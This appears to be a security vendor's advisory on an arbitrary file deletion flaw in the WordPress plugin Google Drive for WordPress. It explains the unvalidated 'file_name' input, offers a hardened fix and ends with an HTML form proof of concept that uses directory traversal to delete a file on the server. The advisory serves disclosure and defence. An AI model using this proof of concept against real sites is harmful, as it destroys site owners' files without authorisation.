From time to time a vulnerability in a plugin is disclosed without the discoverer putting out a complete report on it, and in those cases we put out a post detailing the vulnerability so that we can provide our customers with more complete information.
One of the problems that we find with reports of claimed vulnerabilities in WordPress plugins is that in some instances you have reports that involve real vulnerabilities where the information provided is incomplete or inaccurate. Both of those came up with what turns out to be a report by Lenon Leite of an arbitrary file deletion vulnerability in the plugin Google Drive for WordPress (wp-google-drive). For a reason we don’t quite understand it was labeled as a remote code execution (RCE) vulnerability in the report.
In a post on the website of the discoverer of that vulnerability they go into more detail on arbitrary file deletion vulnerabilities, and reference is again made to RCE without explaining why they are lumping arbitrary file deletion in with RCE. That post also includes another claim we don’t understand:
At the end of November I noticed a file-handling function in PHP that was going unnoticed by developers, perhaps because it seemed harmless. The function in question is unlink, which, for those who do not know, works to delete a file in the filesystem.
It is common to worry about file upload features, even those that read. Unfortunately, they forget the deletion.
There have been plenty of security issues related to file uploads, and the fact that some developers have not properly secured file deletion capability doesn’t mean it goes unnoticed by developers. We already have a number of file deletion vulnerabilities in our data set, some of them that we discovered, so it isn’t like this is a previously unknown type of issue either.
In any case, the arbitrary file deletion vulnerability is in the file /gdrive-ajaxs.php, where a switch statement has its case selected by the POST input “ajaxstype”.
When that POST input is set to “del_fl_bkp” the following code runs:
```php
case 'del_fl_bkp':
    gd_delete_listById($_POST['id']);
    $dir = GBACKUP_PLUGIN_BACKUPFOLDER_PATH."/".$_POST['file_name'];
    @unlink( $dir );
    $dbkp = new settings_option;
    $dbkp->file_manage_list();
    break;
```
That will unlink (delete) a file whose path is specified in part by the POST input “file_name”, which is appended to the backup directory path without any validation. Through the use of directory traversal (“../” sequences in “file_name”), files outside of the intended directory, /wp-content/backup/, can be deleted.
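For comparison, here is how that handler could be hardened. This is an added example, not the plugin’s own code: the helper name gd_delete_backup_file_safely is an assumption, GBACKUP_PLUGIN_BACKUPFOLDER_PATH is the constant used by the plugin code above, and the restriction to a .zip extension is an assumed backup format that would need to match what the plugin actually writes.

```php
<?php
// Added example (not the plugin's own code): a hardened replacement for the
// 'del_fl_bkp' handler. The helper name is an assumption.

function gd_delete_backup_file_safely( $file_name ) {
    // Only accept a bare file name: basename() strips any directory
    // component, so "../../test.txt" collapses to "test.txt".
    $name = basename( (string) $file_name );
    if ( $name === '' || $name === '.' || $name === '..' ) {
        return false;
    }

    // Resolve the backup directory and the candidate path to canonical
    // absolute paths; realpath() returns false if either does not exist.
    $base   = realpath( GBACKUP_PLUGIN_BACKUPFOLDER_PATH );
    $target = realpath( $base . DIRECTORY_SEPARATOR . $name );
    if ( $base === false || $target === false ) {
        return false;
    }

    // Containment check: the resolved target must live directly inside
    // the backup directory, which also defeats symlinks pointing outside it.
    if ( dirname( $target ) !== $base || ! is_file( $target ) ) {
        return false;
    }

    // Restrict to the file type the plugin produces (assumption: .zip).
    if ( strtolower( pathinfo( $target, PATHINFO_EXTENSION ) ) !== 'zip' ) {
        return false;
    }

    return unlink( $target );
}

// Example of the switch case using the helper. The nonce action name
// 'gd_delete_backup' is an assumption; check_ajax_referer() and
// current_user_can() are WordPress core functions and are only available
// once WordPress has been loaded (e.g. when the request goes through
// admin-ajax.php rather than directly to a file under wp-content/plugins).
function gd_handle_del_fl_bkp() {
    check_ajax_referer( 'gd_delete_backup', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Forbidden', '', array( 'response' => 403 ) );
    }
    $file_name = isset( $_POST['file_name'] ) ? $_POST['file_name'] : '';
    if ( ! gd_delete_backup_file_safely( $file_name ) ) {
        wp_die( 'Invalid backup file', '', array( 'response' => 400 ) );
    }
}
```

Two separate problems are being fixed here. The traversal is closed by reducing the input to a bare file name and then checking that the resolved path still sits inside the backup directory; the lack of any authentication in a directly accessible plugin file is closed by routing the request through WordPress so that a nonce and a capability check can run before anything is deleted.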
Proof of Concept
The following proof of concept will cause a file named test.txt in the root directory of the WordPress installation to be deleted.
Make sure to replace “[path to WordPress]” with the location of WordPress.
```html
<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/wp-google-drive/gdrive-ajaxs.php" method="POST">
<input type="hidden" name="ajaxstype" value="del_fl_bkp" />
<input type="hidden" name="file_name" value="../../test.txt" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
```